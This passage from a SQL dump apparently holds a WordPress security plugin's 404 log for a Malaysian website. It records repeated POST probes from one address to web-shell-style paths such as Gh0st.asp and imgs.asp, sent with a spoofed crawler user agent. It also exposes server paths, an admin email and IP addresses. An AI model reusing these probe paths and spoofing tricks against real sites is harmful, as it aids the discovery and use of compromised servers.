Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"174.70.241.18\";s:11:\"REMOTE_PORT\";s:5:\"37649\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaxxhZd0uitCPf4ohr-TvAAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571582343.2723\";s:12:\"REQUEST_TIME\";s:10:\"1571582343\";}}','notice','2019-10-20 14:39:06','2019-10-20 14:39:03',35416464,37223488,'https://bintara.com.my/?page_id=18',1,0,'174.70.241.18'),(28492,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/information-security/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:195:\"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/information-security/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xax6AwNyE4PJlyugCrip4AAAAIc\";s:12:\"REDIRECT_URL\";s:22:\"/information-security/\";s:11:\"REMOTE_ADDR\";s:12:\"157.55.39.83\";s:11:\"REMOTE_PORT\";s:5:\"23070\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:10:\"SCRIPT_URL\";s:22:\"/information-security/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xax6AwNyE4PJlyugCrip4AAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571584515.5501\";s:12:\"REQUEST_TIME\";s:10:\"1571584515\";}}','notice','2019-10-20 15:15:18','2019-10-20 15:15:15',34207568,36007328,'https://bintara.com.my/information-security/',1,0,'157.55.39.83'),(28493,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//images/imgs.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"159.226.164.41\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"159.226.164.41\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/images/imgs.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/images/imgs.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayKc40ygb@uBJr9fsz-KgAAAQc\";s:12:\"REDIRECT_URL\";s:16:\"/images/imgs.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56288\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/images/imgs.asp\";s:10:\"SCRIPT_URL\";s:16:\"/images/imgs.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayKc40ygb@uBJr9fsz-KgAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571588723.3707\";s:12:\"REQUEST_TIME\";s:10:\"1571588723\";}}','notice','2019-10-20 16:25:26','2019-10-20 16:25:23',35852440,37650696,'http://bintara.com.my//images/imgs.asp',1,0,'159.226.164.41'),(28494,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//images/imgs.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.179.176.184\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.179.176.184\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/images/imgs.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/images/imgs.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayKeY0ygb@uBJr9fsz-KwAAAQk\";s:12:\"REDIRECT_URL\";s:16:\"/images/imgs.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56288\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/images/imgs.asp\";s:10:\"SCRIPT_URL\";s:16:\"/images/imgs.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayKeY0ygb@uBJr9fsz-KwAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571588729.5812\";s:12:\"REQUEST_TIME\";s:10:\"1571588729\";}}','notice','2019-10-20 16:25:31','2019-10-20 16:25:29',35268008,37069736,'http://bintara.com.my//images/imgs.asp',1,0,'61.179.176.184'),(28495,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//bookpic/Gh0st.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"210.37.181.165\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"210.37.181.165\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/bookpic/Gh0st.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/bookpic/Gh0st.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayKgpd0uitCPf4ohr-jGwAAAUg\";s:12:\"REDIRECT_URL\";s:18:\"/bookpic/Gh0st.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57168\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/bookpic/Gh0st.asp\";s:10:\"SCRIPT_URL\";s:18:\"/bookpic/Gh0st.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayKgpd0uitCPf4ohr-jGwAAAUg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571588739.0244\";s:12:\"REQUEST_TIME\";s:10:\"1571588739\";}}','notice','2019-10-20 16:25:40','2019-10-20 16:25:39',35269992,37069984,'http://bintara.com.my//bookpic/Gh0st.asp',1,0,'210.37.181.165'),(28496,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"///www.qqwenda.com\";s:14:\"CONTENT_LENGTH\";s:3:\"297\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"159.226.155.118\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"159.226.155.118\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/www.qqwenda.com\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/www.qqwenda.com\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayKkZd0uitCPf4ohr-jJgAAAUY\";s:12:\"REDIRECT_URL\";s:16:\"/www.qqwenda.com\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57539\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/www.qqwenda.com\";s:10:\"SCRIPT_URL\";s:16:\"/www.qqwenda.com\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayKkZd0uitCPf4ohr-jJgAAAUY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571588753.2255\";s:12:\"REQUEST_TIME\";s:10:\"1571588753\";}}','notice','2019-10-20 16:25:54','2019-10-20 16:25:53',35267240,37070848,'http://bintara.com.my///www.qqwenda.com',1,0,'159.226.155.118'),(28497,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"///www.qqwenda.com\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"222.19.68.255\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"222.19.68.255\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/www.qqwenda.com\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/www.qqwenda.com\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayKqo0ygb@uBJr9fsz-MgAAARU\";s:12:\"REDIRECT_URL\";s:16:\"/www.qqwenda.com\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58399\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/www.qqwenda.com\";s:10:\"SCRIPT_URL\";s:16:\"/www.qqwenda.com\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayKqo0ygb@uBJr9fsz-MgAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571588778.7568\";s:12:\"REQUEST_TIME\";s:10:\"1571588778\";}}','notice','2019-10-20 16:26:20','2019-10-20 16:26:19',35342080,37139496,'http://bintara.com.my///www.qqwenda.com',1,0,'222.19.68.255'),(28498,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"///www.qqwenda.com\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"203.93.208.83\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"203.93.208.83\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/www.qqwenda.com\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/www.qqwenda.com\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayKsI0ygb@uBJr9fsz-NQAAAQk\";s:12:\"REDIRECT_URL\";s:16:\"/www.qqwenda.com\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58399\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/www.qqwenda.com\";s:10:\"SCRIPT_URL\";s:16:\"/www.qqwenda.com\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayKsI0ygb@uBJr9fsz-NQAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571588785.0813\";s:12:\"REQUEST_TIME\";s:10:\"1571588785\";}}','notice','2019-10-20 16:26:27','2019-10-20 16:26:25',35270464,37077344,'http://bintara.com.my///www.qqwenda.com',1,0,'203.93.208.83'),(28499,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//admin0/Gh0st.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"211.167.131.236\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"211.167.131.236\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/admin0/Gh0st.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/admin0/Gh0st.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayK2SzkrbMRqg8MvgzwDgAAAFY\";s:12:\"REDIRECT_URL\";s:18:\"/admin0/Gh0st.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"59288\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/admin0/Gh0st.aspx\";s:10:\"SCRIPT_URL\";s:18:\"/admin0/Gh0st.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayK2SzkrbMRqg8MvgzwDgAAAFY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571588825.1976\";s:12:\"REQUEST_TIME\";s:10:\"1571588825\";}}','notice','2019-10-20 16:27:07','2019-10-20 16:27:05',35339624,37147632,'http://bintara.com.my//admin0/Gh0st.aspx',1,0,'211.167.131.236'),(28500,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//images/inc.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; 